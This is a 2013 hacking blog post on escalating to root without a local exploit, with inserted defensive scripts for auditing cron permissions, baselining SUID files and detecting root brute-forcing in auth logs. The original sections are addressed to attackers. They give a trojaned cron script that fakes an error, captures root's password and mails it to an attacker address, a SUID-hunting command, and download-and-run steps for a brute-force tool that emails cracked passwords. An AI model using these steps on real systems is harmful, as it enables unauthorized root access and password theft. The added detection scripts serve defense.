Tuesday, September 24, 2013

Root server without local root exploit

Many hackers find it difficult to find a local root exploit for rooting the server. So here are a few methods you could try to gain root access without using a local root exploit!

1. Custom Cron Tab Scripts

Cron jobs are tasks set to be executed at a specific time. If the root user has created a custom script used by cron, and we can write to this file, we can send a "fake" error message and the root user will probably type in his password.
First, check whether there are any cron job tasks:
 crontab -l
If you see any custom script, we must check whether we can write to it.
Let's say we got a custom script here: /bin/cronscript
To check if we can write to the file, type:
 stat /bin/cronscript

 (If you get something like "-rwxrwxrwx" in the output, you can edit the file!)
Let's edit the file and send a fake error message.
Make a copy of the original script to /bin/cronscript.bak:
 cp /bin/cronscript /bin/cronscript.bak
Edit /bin/cronscript like this:

 echo "A System Error Occurred!"
 echo ""
 echo "Error Code: #131425"
 echo ""
 echo "Update to get the Latest Patch for this Security Issue."
 read -s -p "[sudo] password for root " rootpasswd
 echo ""
 echo "su: Authentication failure"
 echo ""
 sudo apt-get update && sudo apt-get upgrade
 sudo echo "The Password is: $rootpasswd" > .kod
 mail -s "Root's Password" "email@address.com" < .kod
 rm .kod
 mv cronscript.bak cronscript
Replace the e-mail address (email@address.com) and the script name with your own!
After you save the file, type: chmod +x cronscript   to set it as executable!
This script will:
- Send a fake error message
- Ask for root's password
- Send the password to your e-mail address (make sure the "mail" command exists in /bin)
- Restore the original file

When the script gets executed, the root user will enter his password and it will be sent to you!
It would be better if you had some knowledge of Bash programming...
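What the defender's side of this looks like, as an added example that is not from the original post: a small POSIX shell audit that pulls the command out of each line of a user crontab (the `crontab -l` format used above) and flags any script that group or others can write, which is exactly the "-rwxrwxrwx" mode string the `stat` check above is hunting for. The function names, the sample crontab and the two scripts are constructed for the demonstration; system crontabs (/etc/crontab, /etc/cron.d) carry an extra user field and are not parsed here.

```shell
#!/bin/sh
# Added example (not from the original post): audit the scripts a user crontab
# runs and flag any that group or others can write. Function names and the
# sample crontab are constructed for the demonstration.

# Return 0 if only the owner can write FILE, 1 if group or others can write it,
# 2 if it does not exist. Parses the ls mode string, which any POSIX ls prints.
cron_script_writable_by_others() {
    f=$1
    [ -e "$f" ] || { echo "missing: $f"; return 2; }
    mode=$(ls -ld "$f" | cut -c1-10)      # e.g. -rwxrwxrwx
    gw=$(printf '%s' "$mode" | cut -c6)   # group write flag
    ow=$(printf '%s' "$mode" | cut -c9)   # other write flag
    if [ "$gw" = "w" ] || [ "$ow" = "w" ]; then
        echo "WRITABLE BY OTHERS: $f ($mode) -> fix with: chown root:root $f && chmod 755 $f"
        return 1
    fi
    echo "ok: $f ($mode)"
    return 0
}

# Print the first word of each command in a crontab file in `crontab -l` format:
# comments, blank lines and VAR=value lines are skipped and the five schedule
# fields dropped. Only the first word is checked, so commands should use absolute paths.
cron_script_paths() {
    grep -v -e '^[[:space:]]*#' -e '^[[:space:]]*$' -e '^[A-Za-z_][A-Za-z0-9_]*=' "$1" \
        | awk '{ print $6 }'
}

# Audit every script a crontab file names; the return value is the number of
# scripts writable by others (0 means clean). Missing scripts are reported but not counted.
audit_crontab_file() {
    bad=0
    for p in $(cron_script_paths "$1"); do
        cron_script_writable_by_others "$p" && rc=0 || rc=$?
        [ "$rc" -eq 1 ] && bad=$((bad + 1))
    done
    return "$bad"
}

# Demonstration on a constructed crontab and two scripts in a temporary directory;
# no real crontab is read or modified. On a live host you would run:
#   crontab -l > /tmp/ct && audit_crontab_file /tmp/ct
demo_dir=$(mktemp -d)
printf '#!/bin/sh\necho hello\n' > "$demo_dir/safe.sh"; chmod 755 "$demo_dir/safe.sh"
printf '#!/bin/sh\necho hello\n' > "$demo_dir/bad.sh";  chmod 777 "$demo_dir/bad.sh"
printf '# constructed crontab\nMAILTO=root\n*/5 * * * * %s\n0 3 * * * %s >/dev/null 2>&1\n' \
    "$demo_dir/safe.sh" "$demo_dir/bad.sh" > "$demo_dir/crontab"
audit_crontab_file "$demo_dir/crontab" || echo "$? cron script(s) writable by others"
rm -rf "$demo_dir"
```

Anything flagged should end up owned by root with mode 755 or tighter. The directory holding the script matters as much as the file: a writable parent directory lets the script be replaced rather than edited, and this check does not look at directories.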

2. Enumerating all SUID Files

An SUID file is an executable with the set-user-ID bit: whoever runs it, it runs with the privileges of its owner, so an SUID file owned by root runs as root.
What does this mean for you: you can escalate privileges this way if such a file sits in an important directory, or you can social-engineer a privileged user.
To find all SUID files owned by root, type:
 find / -user root -perm -4000 -print
This will print all the SUID files to your terminal. Take your time and check them, as they can help you to escalate privileges!
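A defender gets more out of that `find` by comparing its output against a saved baseline than by reading the whole list each time. The following is an added example, not from the original post: it wraps the post's find predicate in a function and diffs two inventories with `comm`, so a new or vanished setuid-root binary is reported on its own. The baseline and current lists are constructed for the demonstration and the function names are my own.

```shell
#!/bin/sh
# Added example (not from the original post): inventory setuid-root files and
# diff the inventory against a saved baseline. LC_ALL=C keeps sort and comm
# using the same byte-order collation.
export LC_ALL=C

# List setuid-root regular files below DIR, one per line, sorted
# (the post's find predicate, restricted to DIR and to regular files).
list_suid_root() {
    find "$1" -type f -user root -perm -4000 -print 2>/dev/null | sort
}

# Paths in CURRENT that are not in BASELINE (both files: sorted, one path per line).
suid_additions() {
    comm -13 "$1" "$2"
}

# Paths in BASELINE that are no longer in CURRENT.
suid_removals() {
    comm -23 "$1" "$2"
}

# Return 0 when CURRENT matches BASELINE exactly; otherwise print each
# difference with a label and return 1. A new entry deserves a look at who
# created it; a missing one may mean a binary was replaced.
check_suid_baseline() {
    added=$(suid_additions "$1" "$2")
    removed=$(suid_removals "$1" "$2")
    if [ -z "$added" ] && [ -z "$removed" ]; then
        echo "SUID inventory unchanged"
        return 0
    fi
    if [ -n "$added" ]; then
        printf '%s\n' "$added" | sed 's/^/NEW SUID FILE: /'
    fi
    if [ -n "$removed" ]; then
        printf '%s\n' "$removed" | sed 's/^/SUID FILE GONE: /'
    fi
    return 1
}

# Demonstration with constructed lists (no real filesystem scan needed).
# On a live host: list_suid_root / > suid-baseline.txt once, then periodically
#   list_suid_root / > suid-now.txt && check_suid_baseline suid-baseline.txt suid-now.txt
demo_dir=$(mktemp -d)
printf '%s\n' /usr/bin/passwd /usr/bin/su /usr/bin/sudo > "$demo_dir/baseline.txt"
printf '%s\n' /usr/bin/passwd /usr/bin/su /usr/bin/sudo /usr/local/bin/unexpected > "$demo_dir/current.txt"
check_suid_baseline "$demo_dir/baseline.txt" "$demo_dir/current.txt" \
    || echo "exit status $?: review the differences above"
rm -rf "$demo_dir"
```

A new entry under /usr/local, /tmp or a home directory is the one to chase first. Package upgrades legitimately add, move or drop SUID binaries, so refresh the baseline after them rather than silencing the check.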

3. Brute Forcing

I know what you are thinking after seeing the title, but this is different: the tool we are going to use is called Rootdabitch.
What is so special about it?
The magic of this tool is that it works in the background, so you can leave it running for days until you have results... when the password is cracked it will be mailed to you :)
For this, you need phpshell / reverse shell / SSH access to the target to run this tool. You can get the tool here: Rootdabitch v0.1
./rootdabitch.sh youremail@site.com
For kiddies:
First download rootdabitch to the server:
wget http://rootdabitch.googlecode.com/files/rootdabitch-0.1.zip
Extract it by the following cmd:
unzip rootdabitch-0.1.zip
Chmod it to 755:
chmod +x rootdabitch.sh
Finally, run the script:
./rootdabitch.sh youremail@site.com
Simply chmod it and run the script. If the password is cracked you will get a mail containing the root password in the file "passwords.txt" attached to the mail.
That's all, have a gr8 day :)
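A background password-guessing run like the one described leaves a trail: every wrong guess against root through su or sudo is logged by pam_unix as an "authentication failure ... user=root" line. The following is an added example, not from the original post or from the tool's code: it counts those failures per service and calling user and alerts above a threshold. The log lines are constructed in the Debian/Ubuntu auth.log format, and the function names and threshold are my own choices.

```shell
#!/bin/sh
# Added example (not from the original post): spot a password-guessing run
# against root in the authentication log by counting pam_unix failures per
# (service, calling user). Sample log lines are constructed.

# Write a constructed sample auth.log to FILE: six su failures for root from
# www-data, one sudo failure from alice, one failure for a non-root user and
# one successful session; the last two must be ignored by the counter.
write_sample_auth_log() {
    cat > "$1" <<'EOF'
Sep 24 10:01:02 web1 su[2231]: pam_unix(su:auth): authentication failure; logname= uid=33 euid=0 tty=/dev/pts/1 ruser=www-data rhost=  user=root
Sep 24 10:01:03 web1 su[2232]: pam_unix(su:auth): authentication failure; logname= uid=33 euid=0 tty=/dev/pts/1 ruser=www-data rhost=  user=root
Sep 24 10:01:04 web1 su[2233]: pam_unix(su:auth): authentication failure; logname= uid=33 euid=0 tty=/dev/pts/1 ruser=www-data rhost=  user=root
Sep 24 10:01:05 web1 su[2234]: pam_unix(su:auth): authentication failure; logname= uid=33 euid=0 tty=/dev/pts/1 ruser=www-data rhost=  user=root
Sep 24 10:01:06 web1 su[2235]: pam_unix(su:auth): authentication failure; logname= uid=33 euid=0 tty=/dev/pts/1 ruser=www-data rhost=  user=root
Sep 24 10:01:07 web1 su[2236]: pam_unix(su:auth): authentication failure; logname= uid=33 euid=0 tty=/dev/pts/1 ruser=www-data rhost=  user=root
Sep 24 10:15:40 web1 sudo: pam_unix(sudo:auth): authentication failure; logname=alice uid=1000 euid=0 tty=/dev/pts/2 ruser=alice rhost=  user=root
Sep 24 10:16:01 web1 su[2301]: pam_unix(su:auth): authentication failure; logname= uid=1000 euid=0 tty=/dev/pts/2 ruser=alice rhost=  user=bob
Sep 24 10:16:30 web1 su[2302]: pam_unix(su:session): session opened for user root by alice(uid=1000)
EOF
}

# Count pam_unix authentication failures for root per (service, calling user).
# Output lines look like "su www-data 6".
root_auth_failures() {
    awk '
        /pam_unix\([a-z]+:auth\): authentication failure/ && / user=root( |$)/ {
            svc = $0; sub(/.*pam_unix\(/, "", svc); sub(/:auth\).*/, "", svc)
            ru = $0;  sub(/.* ruser=/, "", ru);     sub(/ .*/, "", ru)
            if (ru == "") ru = "(none)"
            n[svc " " ru]++
        }
        END { for (k in n) print k, n[k] }
    ' "$1"
}

# Print every (service, calling user) pair with at least THRESHOLD failures;
# return 1 when any were found (alert), 0 otherwise.
flag_root_bruteforce() {
    root_auth_failures "$1" | awk -v thr="$2" '
        $3 + 0 >= thr + 0 { print "ALERT: " $3 " failed root logins via " $1 " from user " $2; f++ }
        END { exit f ? 1 : 0 }
    '
}

# Demonstration on the constructed log. On a live host pass /var/log/auth.log instead.
demo_dir=$(mktemp -d)
write_sample_auth_log "$demo_dir/auth.log"
root_auth_failures "$demo_dir/auth.log"
flag_root_bruteforce "$demo_dir/auth.log" 5 || echo "(threshold of 5 exceeded)"
rm -rf "$demo_dir"
```

Six failures from one unprivileged account in a few seconds is the pattern to alert on; a human mistypes once or twice. Giving root no password at all (sudo only) and locking accounts after repeated failures with pam_faillock or its equivalent removes the target such a tool depends on.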
